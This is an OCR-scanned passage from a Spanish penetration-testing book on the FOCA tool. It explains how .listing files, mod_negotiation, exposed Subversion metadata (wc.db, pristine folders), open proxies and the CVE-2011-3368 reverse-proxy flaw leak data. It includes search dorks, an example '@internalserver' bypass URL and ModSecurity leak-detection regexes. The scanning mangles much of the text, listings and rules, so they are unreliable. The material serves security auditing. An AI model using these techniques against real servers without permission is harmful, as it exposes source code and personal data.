bluckMouseEven  Ls  =  trm 
transparency  =  1.00; 
displayStatus  =  1; 
displace/  =  "1" ; 
irtt  rcStyle  =  “None". 
intmTine  =  0.2; 
sfcinteme  =  'equal' r 

} 


f/Synhol  48 8  Jtovierlip  l _  Packages,  xcelsiu*.  ACAlertttenaqer]  Fran*  S 

//.  . . -  - - -  - . -  - - 

class  vcelsius.xcAlertManager 

— 


Image ei  04.17:  Codigo  de  art  archivo  SWF. 


En  el  ejemplo  de  la  imagen  04.17  se  muestra  parte  del  codigo  de  un  fichero  SWF  que  FOCA  ha 
localizado  en  uno  de  los  servidores  web  de  una  organizacion  politica  espahola  durante  una  auditoria, 
Tal  y  como  puede  comprobarse,  en  el  aparecen  rutas  locales  y  nombres  de  usuario. 

5  HTT P\i!  www.  show  my  code  .com/ 
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Ficheros  .listing 

FOCA  tambien  iocaliza  de  forma  automatica  los  ficheros  .listing.  Estos  ficheros,  que  son  creados 
per  la  herramienta  \\  GET  cuando  realiza  conexiones  FTP ,  contienen,  on  texto  piano,  el  lislado  del 
di recto rio  enviado  por  el  servidor  FTP. 


La  explicacion  sobre  porque  se  crean  estos  archivos  aparece  en  la  seccion  del  propio  manual  de  uso 
de  la  herramienta  wget  •'  donde  se  expllean  las  opciones  relati  vas  a  las  conexiones  FTP.  Una  de  estas 
opciones  es  el  flag  -no-remove  A  is  ting1 5  que  cuando  esta  active  indica  al  servidor  que  no  el  inline 
este  fichero. 

La  justification  que  aparece  en  el  manual  para  la  aetivacidn  de  este  parametro  es  que  estos  ficheros 
pueden  resultar  utiles  para  procesos  de  depuracion  o  para  permitir  al  usuario  comprobar  de  fomia 
sene  ilia  el  conlenido  de  los  director!  os  de  un  servidor  remoto,  como,  por  ejemplo,  al  verificar  que 
una  copia  en  un  servidor  espejo  se  ha  com  pi  eta  do  correctameme. 


f~fi  https://w ww® 

listing 

unriir  "twtt1 

-rv-r- -r-- 

1 

12946 

OCC 

Sep 

25 

2009  index. php 

-rv-r-  r— 

I 

13496 

Aug 

7 

2009  index2.php 

-  tv-  r-  -  r-  ■ 

1 

19 

Mar 

24 

2009  info. php 

rvr-r-- 

1 

5033 

Aug 

10 

2009  infosec.php 

-  rvxr-xr-x 

1 

9593 

Jun 

17 

2009  ini.inc.php 

-  rv-  r-  -  r-  - 

1 

5503 

Aug 

13 

2009  live- response, php 

-rv-r--r-- 

1 

13345 

Jul 

6 

2009  liveResponse -video- form. php 

drvxr-xr-x 

6 

4096 

Sep 

7 

08:52  liveresponse 

-rv-r--r-- 

1 

86626 

May 

13 

2009  liveresponse , png 

-rv-r--r-- 

1  # 

2957 

Feb 

5 

2009  login . php 

-  rv-r--r-~ 

i  $ 

1836 

Feb 

14 

2000  news. php 

-  rv-  r-r- 

1 

819 

Feb 

3 

2009  pagetei&plats .  php 

■rv-r—r-- 

1  7: 

393G2 

Jan 

1 

1970  php. ini 

-rv-r--r— 

1  V; 

6069 

Aug 

10 

2009  privacy-policy  ..php 

-rv-r--r-- 

i 

6921 

JuX 

16 

2009  products . php 

-  r v-r--r-~ 

i 

6935 

Apr 

30 

2G09  products. php 

-nc-r-  -r-- 

i 

5323 

Apr 

30 

2009  protected. php 

-rv-r  -r-  - 

i 

4S2Q 

Apr 

27 

2G09  register' overview. php 

-rv-r-  -r-  - 

i 

3201 

Feb 

12 

2009  security' image. inc  . php 

-  rv-r-  -r-  - 

i 

739 

Feb 

12 

2009  security -iaage. php 

-  rv-r-  -  r-  - 

i 

12401 

Mar 

24 

17:56  sendcontact.php 

-  rv-r-  -  r-  - 

i 

3032 

Feb 

14 

2009  services. php 

d  rvx  r  -  x  r  -  x 

3 

4096 

Feb 

3 

2009  slices 

-  rv-r-  -  r-  - 

1 

5360 

Apr 

10 

2009  special -offerl. php 

drvxr-xr-x 

24 

4096 

Sep 

7 

08:52  staging 

drvxr-xr-x 

13 

4096 

Aug 

7 

2009  store 

drvxr'Xr*x 

14 

4096 

Jun 

21 

2009  storel 

-  rv^  r-  -  r-  - 

1 

1G941 

May 

22 

2009  style. css 

-  rv-  r-  -  r-  - 

1  & 

853 

Feb 

14 

2009  sugar_for*.php 

drvxr-xr’X 

12 

4006 

Aug 

9 

2009  support 

-rw-r--r-  - 

1  §, 

3146 

Feb 

4 

2G1G  support. php 

-rv-r--r-- 

i  ; 

356 

Jut 

21 

2009  test. php 

-rv-r--r-- 

i 

1787 

Apr 

9 

2009  thank-you . php 

drvxr-xr-x 

3 

4096 

Dec 

7 

2009  training 

-rv-r--r- - 

1 

13366 

Jut 

7 

2009  training-signup-Ol.php 

-rv-r-  -r-  - 

1 

7965 

Jun 

23 

2009  training-thanks-Ql.php 

drvxr-xr-x 

2 

4096 

Feb 

14 

2009  t  rani  rig 

rv  r--r-- 

1 

5638 

Aug 

11 

2009 

drvxr-xr-x 

2 

4096 

Apr 

13 

2009  video 

hnagen  04.18:  Fichcro  .listing. 


6  HTTPJ/www.gn  u.  org/sq/hi -are!  wget/m  a  n  ualAv  get.  HTMIMFTP-OP  TIG  NS 
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Algo  que  resulta  llamativo  es  que  en  esa  seceion  del  manual  aparece  un  parrafo  relative  a  la  seguridad 
en  el  que,  no  solo  no  se  alerla  a  los  usuarios  de  los  potendales  riesgos  que  puede  imp  Hear  el  uso 
de  este  parametro,  sino  que  los  autores  transmiten  una  falsa  sensacion  de  seguridad  al  informar  de 
ciertos  mecanismos  establecidos  para  evitar  posibles  situaeiones  de  riesgo,  como  que  un  usuario 
creara  un  enlace  simbolico  a  /etc/passwd  e  consiguiera  que  el  usuario  root  usara  wget. 

Realizando  una  sencitla  busqueda  en  Google  utilizando  el  operador  ext  es  posible  local  izar  miles 
de  sitios  web  que  tienen  publicados  este  tipo  de  archives  que  permiten  listar  el  contenido  de  un 
di  rector io  a l  ser  invocados. 

En  la  figura  04.19  se  muestra  el  contenido  de  uno  de  estos  archivos  .listing  que  ha  sido  localizado 
por  FOCA  en  uno  de  los  servidores  de  un  doniinio  durante  un  proceso  de  audiloria.  Observando  la 
imagen  eon  detalle  se  puede  observar  que  el  listado  del  directorio  contiene  recursos  que,  a  priori, 
parecen  muy  prometedores  para  un  pen  tester. 

En  este  sentido,  uno  de  los  archivos  que  llama  la  atencion  es  el  fichero  users. PHP  y,  efectivamente, 
al  solicitar  este  recurso  el  servidor  dev uelve  un  listado  con  los  datos  personales  de  los  usuarios  del 
sitio  web,  tal  y  como  se  muestra  en  la  imagen  04.19. 


Imagen  04.19:  Listado  de  datos  personales  de  usuarios  obtenido  a  traves  del  fichero  .listing 
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Pen  testing  con  FOCA 


Multiple  Choices:  mod  negotiation 

Para  todos  I  os  servidores  web  Apache  do!  dominio  objetivo  que  FOCA  localiza,  cl  programs 
comprueba  si  tienen  activada  la  opcion  mod  negotiation.  Este  modulo  permite  generar,  con  la 
option  MultiViews ,  una  lista  de  ficheros  simdares  cuando  el  nombre  del  archive  solicitado  no  se 
encuentra  en  el  servidor. 


Asl,  si  un  clienle  solicits  por  ejemplo  el  recurso  robots.,  el  modulo  mod  negotiation  realiza  un  b 
robots  A  en  el  directorio  y  mostrara  todas  las  posibles  opciones,  Por  tanto,  en  aqueltos  servidores 
donde  esta  opcion  este  acti  vada,  es  posible  tratar  de  encontrar  archivos  de  copias  de  seguridad  do 
determinadas  aplicaciones. 

FOCA  realiza  una  sencilla  prueba  buscando  el  fiehero  ..FOCA ,  lo  que  hace  que  se  muestren  todos 
los  archivos  que  comienzan  por  un  punto.  Esto,  en  sistemas  Apache  siempre  permitira  que  aparezean 
siempre  los  enlaces  al  directorio  actual  4 Vs  y  al  directorio  padre  ”,  por  lo  que  si  esta  activado 
mod  negotiation  siempre  aparece  un  resultado. 


Una  vez  que  se  ha  conseguido  descubrir  que  el  modulo  esla  activado  en  un  serv  idor,  se  debera  probar 
la  lista  de  todos  los  ficheros  disponibles  en  un  servidor  web ,  Para  ello  se  pueden  localizar  las  URLs 
Index adas  en  cualquier  buscador  de  todos  los  ficheros  dc  los  que  nos  interese  encontrar  un  backup 
o  bien  hacer  un  crawling  primero  a!  sitio  web  y  probar  todas  las  URLs.  Una  vez  localizados  los 
ficheros,  el  ataeante  pod  da  sol  id  tar  a  I  servidor  web  con  mod  negotiation  todos  los  archivos,  uno 
a  uno,  pero  modificando  la  pcticion  para  borrar  la  extension.  De  esta  forma,  si  existe  una  copia  de 
seguridad  en  el  mismo  directorio,  el  servidor  mostraria  ambos  archivos. 


C  ti  ©www.i 


Multiple  Choices 


The  document  name  you  requested  {/ciimate/iamto . )  could  not  be  found  on  this  server. 
However,  we  found  documents  with  names  similar  to  the  one  you  requested . 

Available  documents: 

•  /climated 3 mto .php  (common  basename) 

•  /eiimafe/13  mto  .php  jmk  (common  basename) 

•  /cliniato/13mto  .bk  .php  (common  basename) 


Apache  Server  at  www 


Port  80 


lmagen  04.20:  Servidor  web  con  !a  opcion  mod  negotiation  activa. 


Por  ejemplo,  tal  y  cornu  se  puede  comprobar  en  La  imagen  04.20,  tras  localizar  el  archivo  Binto./Y/P 
en  un  buscador  de  internet,  se  solicits  al  servidor  el  recurso  13mto.,  sin  incluir  la  extension  PHP. 
Asi,  el  servidor  busca  cn  cl  directorio  todos  los  archivos  con  nombres  simi lares  para  mostrarselos  al 
usuario,  entre  los  que  se  encuentra  la  copia  de  seguridad. 


Capita /o  IV.  Busqueda  de  Vulnerabilidades 
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Ficheros  .svn/entries  de  repositorios  Subversion 

Dentro  de  I  os  repositorios  de  codigo  de  Subverions,  se  eneuentran  I  os  ficheros  .svn/entries,  que 
almacenan  la  informacion  de  las  ultimas  actual izaci ones  que  se  han  realizado  en  un  proyecto  de 
desarrollo  que  utiliza  SVN como  gestor  de  codigo.  Tan  solo  son  archivos  de  texto  eon  el  aspecto  del 
que  vemos  en  la  hnagen  04.2  U  que  ha  sido  descubierto  por  FOCA  analizando  los  servidores  de  una 
organizacion. 

Este  tipo  de  ficheros,  que  deberian  estar  protegidos,  en  ocas i ones  son  local izados  por  los  auditores  de 
seguridad  en  Internet  por  lo  comodo  que  les  resulta  a  los  desarrolladores  web  tener  el  repositorio  en 
el  mismo  servidor  donde  se  esta  publieando  la  aplicacion,  pero  la  informaeidn  que  puede  obtenerse 
de  el  los  hace  que  esta  sea  una  practica  poco  recomendable. 

Tnspecetonando  estos  ficheros  es  posible  descubrir  usuarios,  rutas  intemas,  fechas  e  information 
tactiea  de  la  compama  que  puede  ser  de  mucha  utilidad  para  lanzar  ataques  de  fuerza  bruta,  descubrir 
ficheros  ocultos  o  perdidos,  o  simplenriente  nuevas  URLs  de  servidores  web  para  analizarlos 
posteriormente  con  FOCA . 

Para  que  la  lecturade  estos  ficheros  sea  mas  sencilla  se  ha  desarrollado  un  plugin,  cuyo  funcionamiento 
se  explica  en  detalle  en  el  capitulo  5,  que  es  capaz  de  parsear  estos  archivos  para  acceder  de  forma 
cornoda  a  todos  los  dates  que  aparecen  en  el  y  mostrar  los  datos  organizados  por  tipos  de  ficheros, 
usuarios  o  n ombres  de  archivos. 

;*■  i»  ~es:8l/  pdateSite/featur0s/.svn/entries| 

https : //  ,  googlecode -  com/s vn/trunk/M2DATDBUpdateSite/featu res 

https://  , googlecode . cora/svn 

2Q10- G6-01T13 : 39:31. 172920Z 
99 

alvaro . 

svn : special  svn ; externals  svn : needs-lock 

b  0488622- Of e6 - 1 1 d  f - 96e  b - C  71931 f  3db84 

GRDB40RAFe  a  tu  re_l ,  □ .  Q .  j  a  r 
file 

201 0- G€ - 01T1 3 : 42 : 48 . 9771 25Z 
3b  a  b  b  753bc  b  9c  9da720f  f 801 862b  2231 
2010- 06 - G1T1 3 : 39 : 31 . 1 72920Z 
99 

alvaro 

has -props _ 

Imagen  04.21:  Contenido  de  un  fichero  .svn/entries. 


Normalmente,  encontrar  un  fichero  svn/entries  permite  local  izar  un  monton  de  juicy  files.  FOCA 
busca  esle  tipo  de  repositorios,  pero  haciendo  uso  de  ios  patrones  de  directory  listing  o  el  plugin g  de 
fuzzing  que  veremos  en  el  capitulo  5,  se  pueden  local  izar  mas  repositorios  de  codigo  fuente. 
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Pentesting  con  FOCA 


Descarga  de  ficheros  con  Pristine  v  wc,db  en  repositorios  Subversion 

Adeinas  de  los  ficheros  jsvn/entries,  existen  otros  dos  archivos  relacionados  con  Subversion  que 
pueden  producir  fugas  de  informacion  hasta  el  punto  de  dejar  vista  para  sentencia  una  auditoria  de 
seguridad  con  tal  solo  localizar  el  repositorios  de  codigo  en  un  sitio  web  publico. 


El  fichero  wc.  db  es  la  base  de  datos  de  Subversion  y  en  el  la  se  puede  encontrar  informacion  de  todos 
los  ficheros  que  se  han  subido  al  servidor,  incluso  ctiando  el  fichero  .svnf entries  este  vacio,  algo  que 
puede  ser  habitual.  Para  localizar  eslas  bases  de  dales  has  La  eon  encontrar  el  fichero  .svn/entries 
con  FOCA  o  ejecular  algun  dork  sencillo  en  un  buscador.  Por  ejemplo,  en  Bing  podria  utilizarse  la 
siguiente  cadcna  de  busqueda  para  encontrar  este  tipo  de  archivos: 

ext.db  wc.db 

Una  vez  descargada  la  base  de  datos  es  posible  comprobar  que  se  trata  de  un  archive  SQLite,  por 
lo  que  el  primer  paso  para  tratar  de  acceder  a  su  contenido  seria  utilizar  alguna  aplicacion  similar 
a  SQLite  DataBase  Browser1  que  permita  navegar  por  su  estructura*  En  caso  de  que  la  base  de 
datos  aparezea  vacia  es  posible  recurrir  al  servicio  web  Recover  Messages que  permite  realizar  un 
analisis  forense  de  archivos  SQLite  y  descargar  los  resultados  obtenidos  a  un  fichero  de  texto. 


Abriendo  este  fichero  obtenido  con  un  editor  de  texto  sera  posible  acceder  a  los  nombres  de  los 
archivos  que  se  encuentran  en  el  servidor,  por  lo  que  es  una  situacion  comparable  a  disponer  del 
fichero  .svn/entries  complete* 


mmm 


*1  TABLE 

WWH  =  )=A^KfAti^yXqAnl^^flaf.^^£SAb£tableWC_LOCKWC^LOCKCREATE  TABLE 

WCJlDCK  {  wc_id  INTEGER  NOT  NULL  REFERENCES  WEROOT  fid) ,  TEXT  NOT  NULL,  lacked_leuels 

INTEGER  NOT  NULL  DEFAULT  -1,  PRIMARY  KEY  <wc_idt  mMSkmm. 

TRIGGER  nodes_delete_t rigger  AFTER  DELETE  ON  nodes  WHEN  OLD . checksum  IB  NOT  NULL  BEGIN  UPDATE 

CREATE  INDEX  I_EXTERNALS_PARENT  ON  EXTERNALS  (wc_id , 

MLKIlLJCfikMilO  c  LGft£tL45  a? .mate  AflOSZEMi  E7  *  U  t  heme  s /& r-Aph i  n-Kf. MfflV 

imas  ilfrflWM/  d  r-iatuv^v 

.  '  ‘  '  *  . . . .  '  kG 


. . . . . . . . . . . . . . — _ „ _ 

t  hem  I  G7  Alt  hem  es /fl  pT jatU>"K£MflY/«PA  A0 m  (If- i  fttWJ-lMLDilflWfflJ: MS .ftMTKfi&aflX/t  hemes/ 

rtr -IfthO-hMAfly/Q  Ption  s%sAMMftk$AfiAiJ:  U  i  n  f  i  n  i  t  y  n»EX¥*  r  i  n-  qG  A 7  i  t  hem  e  s  /ft  f -Aft  tlltKPAM  YJ&P  tiom/ 

y#n a s M?  Aitheme s/Ar-latok-KttoA**/ fci/MMU-Jt*  r.ti JxJ - 

*»  A%ith«n*s/aeAfltiaTfcsiw^^ 

AHA  £JH£  L7U&J  fcrift  hn-k?,naa  y/ 1  hem  e  s  /£  fflMy/lftrf.  y in  . 

g 7  ASizI  [7  A )  it h en e s/^r-^fihn-k?.naay/tp^lpA.^.te^;^hp,th^^s/tl:-iDhn-K^naay>?o 

&Wr^S3tIS^AS/  dflTAftfeD -Ks 'X  17  Ai  t  hem  e  s/flr-jo  ^n-^F^ay/p  EzAftlKfciilfiM  a  mi  $5/  MAR  L-JMt  t?  a 

*  s  L  u  p  to  a  d  s/^13^1p^wo  rjjp  re,IP/p.M  IfUKfJGUAY/  AllTifltUJ-.feMay/  u  p l oad  s / 2fl 1 3%£U)£  jfflfiAfiiSZlA  lAfifJtiSXV. 

*  *>  7  A  i  t  hem  e  s/pr-afthn-kpnapy/  s j;f.h ,  p^t  &Lz 1  Rt!iQtd&fLMaiOflirkltB£fi»/  PJSflRJSX  r.e^y/ALdLftfeS^ 

Ka^ay/t  her»es/jJj;rjjihE^  S  Aw  ASit  he^  e  s /d  r.7aph.n -Kf*n^ay/  Ub/enhanced-custD^ -fields/  ^  l  A/ ^ 

ipbf?-KF*naay/  lib/enhanced-custom-f  ield  s/tp^^ordp  LJtX  tlLvi  HtL0 .tK^AY/  t  h  ente  s  / 

enhaoced-custoni-fields/JJgls/iJaJillB^Ab )  AA 

Ai  1 1  hem  es/ d  r-j  pin  -  k£,na  gy/Ub/enhanced-cus  tom-  fields/  ?V.tHPioad/  p.1.4  pin  s  the^p^/ 

e  n  h  ante  d-custom-f  ields  /  tpX|/ swf jjp  lo^pwo  rppres  r^y/ r-^p^n -Kf.n  gpy/  themes  /dfcifltaLTJMflflfltf 1  ib/  ethane  ed- 

c  u  s  t  om- f  ie  Id  s  ^5/  plugins$incompleteA  A%A 

As  it  heme  s>  fl  Lrl  Rt?.r;.:  D  y/Iib/enhanced-tus  tom-  fields/  t^U/  RKtUP.ll*afil7 ftrf JjflkMfl  J  A  X  tl WfiS/Slr.Ti  1  ih/ 

e  n  hftn  c  t  d  -  c  m  t  m  -  f  ie  \  dx /Ap  W  AVfJJfi  iQA  r-JPZX  1  hemes  /  df-ifltlO -KMafly/  Uh/enhanced- 

c  us  t  om-  f  i  e  Id  s  /Aft  WhY.lm  kMd*  *  * '  * 

Au !  themes  r-j  phn-^rijagy/  lib/enhanced -custom- fie  Id  s/^S/  Kf m  Ry/  U  &  / 

e  nhan  ced-custom-fiel  ds/Aft  WlXt dfi  l&R&M&ftoXRkfSn  WLJVXf^WA  r4Tiflto-K^a  ay /  themes  1  i  b/e  nhanced- 

c  us  t  on  -  f  i  e  Id  s  /A  ft  kt/attf.W  ft  IfiatiJ  Documentation  S  iDB  A?  A  C  it  h  erne  s  /  df.TifttW.TKMAfty/  lib/efthaficetf-cuxtom- 

f  ields/AftAf/*ttfWftiMft/ri>-*sh/^t.?/;MBJlXfl.kW,WAnaTJ;A/irtjHtW,tHfL|:jfty/ 1  ib/enhanced-custom-r  ie  Ids/AfiX?/  AttfiyfiXMil/ 

f.  kMfawflJd  ft  W  kfJ  ftF.CAT— rtf.Ta  ft  fc>- t  h  tin  i  /  ft  f '7 j  ft  tiR-iffliMVJ  11  b/enhanced  - custom-fields  /£&]$/ snfJUB.  XqM/ 


Imaeen  04.22:  El  vokado  forense  del  fichero  SQLite  hecho  con  Recover  Messages, 


7  HTTP:  //so  ureef orge  ,NET/pro]  ects/sq  l  i te brow s e r,7 so u rc e =DL P 

8  HTTP:  //wwYv.recovermessage  s .  c  om/ 
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Llegados  a  este  panto,  es  suficiente  con  solicitar  cada  fichero  a]  servidor  con  su  ubicacidn  concreta 
para  acceder  a  el,  y  puede  que  incluso  acabemos  localizando  ficheros  que  ya  no  estan  dentro  del 
repositorio  de  codigo,  pero  que  alguna  vcz  lo  eslubierom 

Por  otra  parte,  el  gestor  de  proyectos  Subversion  guarda  una  copia  de  todos  los  archives  originates 
que  se  suben  ai  servidor  en  una  carpeta  llamada  pristine.  En  esta  carpeta  el  n ombre  de  ios  archives  se 
ofusca  utihzando  el  algoritmo  de  hashing  basado  en  SHAl  para  el  nombre,  y  anadiendo  a  los  fichcros 
que  se  almacenan  una  extension  conocida  del  tipo  .svn-base. 

El  uso  de  esa  extension  especial  hace  que  no  se  los  tipos  MIME  asoeiados  al  nombre  origial  que 
tuviera  dicbo  archivo.  Es  deeir,  que  un  archive  de  tipo  PHP  que  liene  una  extension  .PHP  estara 
almacenado  dentro  de  la  carpeta  pristine  como  un  archivo  eon  extension  .svn-base  y  por  lo  tanto, 
cuando  alguien  lo  solicita,  el  servidor  web  no  va  a  tratar  de  ejeeutar  el  codigo  con  el  motor  PHP . 

Esto  permite  que  un  usuario  que  eonozca  el  nombre  de  un  archivo  PHP,  pueda  pedir  la  copia  de  la 
carpeta  pristine  pidiendo  un  fichero  del  tipo: 

-  pristine/SHA  1  (nombre). s  vn-base 


Para  simplificar  y  automatizar  este  proceso  puede  utilizarse  el  programa  svnpristine?,  al  que  solo  hay 
que  pasarle  la  ruta  del  servidor  donde  se  encuentra  la  raiz  de  Subversion  para  que  vuelque  Loda  la 
carpeta  pristine  a  un  di  rector  io  local. 


*!ac£k>ok:  Downloads  Chemat 
/var/^f  older  s/ls/qB79h3pn  07?  lbqwym2bt  EitiT4  SBBBgn  /T72  eDptKAIwl 


q Tabbing 
g  Tabbing 
vn-base 
grabbing 


922b0acl712, svn-base 
g  Tabbing 


wo — content /  / 1  h  em  e  s  /  d  r- 1  o  h  n-  ke  n  a  fl  v |s  ^  r ftfll f rom  http: /, 
wp-eon  t  ent//t  heme  s /d  t- j  ohn-kenagy/6pt idns/ottie  r-op t ion  s , php 


/wp-content//themes/d  r-john-kenagy/libjliacks.'^Hpj  f  ram  http:  // 
/wp-content//t  hemes/d  r-j  ohn-kenagy/lib/?WTOTO^tLi  st  om-f  ie  Ids/new-f  1  lei 

wp-eontef>t//thefnes/dr“john-kenagy/lib/enhanced-custom-fields^tpls/ric 

|ywp-content//theffles/dr-)Qhn-kenagy/tib/enhanced-cLJstoi!i-fields/tpl5/}s 


/wp-contenty/themes/dMohn-kenagy/lib/enhanced-custoiTi-fields/tpis/ecf 


bfl60f ld9aB3c99053f ac0 . svn-base 


Tmagen  04.23:  Vole  ado  de  pristine  con  svnpristine. 


En  la  Imagen  04.23  se  puede  ver  como,  tras  ejeeutar  la  herramienta  svnpristinepl  -  escrita  en  Perl- 
sob  re  una  Ur  l  en  la  que  se  encuentra  un  repositorio  de  codigo  Subversion,  la  utilidad  busca  la  carpeta 
wc.dh ,  extrae  la  lista  de  las  URLs  y  genera  los  nombres  de  los  ficheros  que  deben  ser  solicitados  a  la 
carpeta  pristine  para  que  puedan  ser  deseargados. 

Obtener  el  codigo  PUP  de  una  aplicaeion  permite,  como  ya  se  ha  comen tado  con  anterioridad, 
acceder  a  usuarios,  comentarios,  con  ex  ion  es  a  base  de  datos,  etcetera.  Si  FOCA  localiza  un  servidor 
con  un  fichero  .svnf entries,  entonces  tienes  trabajo  por  delante  analizando  todo  el  codigo  fuente  que 
puedas,  no  solo  las  listas  de  ficheros  que  pueda  extraer  el  plugin  que  veremos  mas  add  ante. 


9  HTTP-Jiw w w,  c  i rt.jV£T/svn pristine 
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Busqueda  dc  servidores  Proxy 

En  las  opciones  de  configuracion  de  FOCA  tambien  es  posible  seleccionar  la  busqueda  de  servidores 
Proxy  en  los  equipos  de  los  dominies.  De  esta  forma,  per  cada  servidor  localizado  se  trala  de  hacer 
una  conexion  al  servidor  de  Google  -  por  tener  un  gran  uptime  -  a  traves  de  un  servicio  Proxy 
supuestamenie  descubierto  en  la  maquina  objeiivo. 

Ademas  de  los  puertos  80,  443,  8080  y  8081,  FOCA  tambien  puede  analizar  el  puerto  3  128,  que  es 
el  que  habitual  men  te  utiliza  el  servidor  Squid  Proxy ,  y  el  usuario  puede  personalizar  en  la  pestana 
Proxy  Search  del  menu  opciones  los  puertos  en  los  que  se  desea  que  el  programa  trate  de  encontrar 
un  Proxy  en  los  servidores  loealizados*  Hay  que  tener  en  cuenta  que,  una  vez  localizado  un  servicio 
Proxy  que  permite  conectarse  a  traves  de  el,  un  ataeanle  podria  utilizar  ese  servidor  para  navegar  por 
la  Intranet  de  la  empresa,  lo  que  conlteva  un  autentico  problems  de  seguridad. 

Ademas  de  la  busqueda  pro-activa  de  servidores  Proxy ,  tambien  hay  que  tener  en  cuenta  que 
exiten  vulnerabilidades  en  el  los  que  pueden  ser  utiiizadas  aim  cuando  el  servicio  Proxy  prohiba  la 
navegacion  hacia  afuera.  Esto  ocurre,  por  ejemplo,  con  los  servidores  web  Apache  cuando  estan 
configurados  en  modo  Proxy  reverse,  lo  que  provoco  que  se  publicara  un  parche  (CV-201 1-3368) 
que  reduce  el  riesgo  de  configuraciones  explotables. 

El  motivo  de  este  hug  es  que  cuando  un  servidor  de  cara  a  Internet  en  la  misma  direceion  IP  con 
un  serv  icio  de  Reverse  Proxy  vulnerable,  la  regia  que  venia  por  defect©  para  la  publicacion  de 
servidores  extern  os  a  traves  de  un  servicio  de  modjiroxy  es  tal  que: 

-  RewriteRule  %  *)  H  TTP.'ffi  n  tern  a  Is  erver;  8  0$  /  [P] 

Aparentemente  cs  una  regia  normal  en  la  que  se  esta  reescribiendo  una  peticion  HTTP  a  la  IP  externa 
o  al  hostname  extemo  a  una  peticion  al  servidor  interno  publicado,  en  este  caso  internals  erver. 
Aunque  la  configuracion  pueda  parecer  eorrecia,  la  Vulnerabilidad  radica  en  que  el  estandar  de 
URLs  permite  escribir  una  peticion  HTTP  con  un  usuario, password. \  hostname , puerto  y  path,  tal  y 
como  se  ve  en  la  imagen  04.24: 


ftttpj  conii  |K)  8  <|/  x*  ea  t  s  id— ^bottom 

scheme  outhenticafton  domain  part  path  parameter  fragment 

details 


Imagen  04.24:  Peticion  HTTP  con  usuario,  password  y  hostname. 

Por  tanto,  al  atacante  le  bastaria  eon  enviar  al  hostname  de  la  weh  una  ruta  que  empezara  por  @  y 
que  tuviera  la  ruta  interna  del  serv  idor,  es  dear,  algo  como  @otro  servidor  interna :&Qf ruta.  De  esta 
forma,  intemalserver:80  se  convert! rian  en  el  usuario  y  password  de  una  ruta  que  quedaria  como: 

H  TTP://intemalserver;SO@o  tro  servidor  in  tern  to :  80/m  fa 

De  esta  forma  se  permitiria  el  acceso  a  los  servidores  internes  que  no  pidan  usuario  y  password.  La 
solucion  en  el  parch  e  ha  sido  tan  sencilla  eomo  anadir  un  slash  a  la  regia  de  rewrite: 

-  RewriteRule  %  *)  HTTP: //in ternalserver: 80/$  1  [PJ 
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Data  Leaks:  Fugas  de  information 

Una  de  las  fund  ones  que  mejores  resuitados  da  en  las  auditonas  de  seguridad  que  se  realizan  con 
FOCA  es  la  de  analizar  el  cod i go  fuente  de  las  paginas  solicitadas  buscando  las  expresiones  regulat  es 
del  fichero  de  reglas  anti-fuga  de  informadon  del  modulo  de  Mod  Security.  Ese  fichero  de  reglas 
dedicadas  a  filtrar  leaks  se  le  conoce  como  modseeuritycrs  _5Q  out  hound. conf  y  si  se  analiza  se 
puede  ver  que  son  expresiones  regu lares  en  husca  de  patrones  que  tienen  que  ver  con  expresiones 
SQL „  codigos  scripts,  y  si  mi  lares. 


*■  C 


|i'Jittpd/mod  u  les/modsecuf i ty  ~  a  pache_2.  L4/rules/modsecuri ty_crs_S0_outix3  u  nd  ^  ^ 


3ecEulc  RESPONSE  BODY  -\b( ? :  (3 : s  l? : elect  Hat  because  it  ia  not  contained  in  (?:ah  aggregate 
function  and  there  is  no  1  either  an  aggregate  function  or  the!  GROUP  BY  clause | upplied  argument  ia 
not  a  valid  t 1  Feature) SQL  1 Q  ( ? : racle J DBC) )  }  1 5  (? : yntox  error  converting  the  Vw+  value 

.*?  to  a  cciumc  of  data  typelQL  Server  does  not  exist  or  access  denied) ] Either  BOF  or  EOF  is  True, 
or  the  cottent  record  has  been  deleted ( ? :  ;  the  eperatian | \ .  Requested)  (The  column  prefix  £0,  50)  ? 
does  not  match  with  a  table  name  or  alias  name  used  in  the  query  I  Could  not  find  server  ,\w+‘  in 
syaservers\ .  c  restate  Sp^ftddlmkedaerver)  \h)  (?!( 7  :  Micros  Oft  OI^  DB  Frcvidtr  far  .{0,30)  [e£]i:eq  J  You 
have  an  error  in  your  SQL  syntax  neajr  ] error  ' SOGaOlbS )'] On (?: closed  quotation  mark  before  the 
charscter  3tring\bi|  able  to  connect  to  PoatgreBQL  server  :)  M ? ;Warning :  mysql_ocmnect\  (A)  I  Post gte; SQL 
query  failed)  ;  |  cannot  take  a  \w+  data  type  as  an  a  xgnmer.tA .  { incorrect  syntax  near 

[r:\Mthe\biigllerrQr\tjMiiticrQSGft  get  database  engine  error  11  a  |  :  \  [Microsoft's J\  (.ODBC  l  ORA- \dt  : )  )  * 

\ 

*  c 1 1 : audl tLcg  P&f  t  s*+E ,  deny ,  log  r  audi  t  la  g ,  s  t  a  t  us :  So  0  P  msg :  1  SQL  Inf  onra  t  i  on 
Leakage  * , id : 1 97DQQ3 ' , severity : 1 4 T * 

SecRule  RE3FOH3E_BODY  *  ft :  \b  (?  :A  (?:  DO£>B\  .  Comanrid^  b .{ 0, 100 }  ?Vb  (?:  Application  usea  a  value  of  the 
wrong  type  for  the  current  operaticm,\b| error 1 )  I  trappable  error  occurred  in  an  external  object^  The 
script  cannot  continue  rurvning\b)  (Microsoft  VBScript  (  ?  :  coiapilation  4,?:\ (OxS  herror)  (runtime 
(?  :Er£cr |  \  (OxS) )  \b| Object  tequired:  ']  error  'B00|  Kb>V«sicifl  Itloumtiuji! <\/b>  <  7  :  tnbap;  1  \s) 
(?:Hicrasaft  \  .  NET  Framework  1  ASF\  .  NET)  Version  :]  f  ?  i \/ JEe  ]  rror  (Mm]  esaageV  .  aspx?\  ?  I  EeJ  rror  ( >error 
■ASF>\b>"  \ 

wctl  i  audiitLogFarts^+E  rdeny,F  log,  audltlog,  status  :  5Q0,  lasg :  1 115  Inforinacian 
Leakage  r ,  id :  1  97QG04  1 ,  severity :  1  4  1 

SecRule  RESPONSE  BODY  "\bServer  Error  in  „  ffl,  5G  }  ?'\faApplicaticm\brf  \ 

"chain,  ctl  :auditLogPaita=+E1rdeTiyF  log, auditing, status:  500, msg:  "  IIS  Information 
Leakage  1 ,  id:  *  37Q3D-1  ■  ,  severity :  1  i  “  ■* 

SecRule  RE SPCNS E_STATUS  " i 

SecRule  RESFON3E_BODY  "\bart  error  was  encountered  while  publishing  this  resourceXb"  \ 

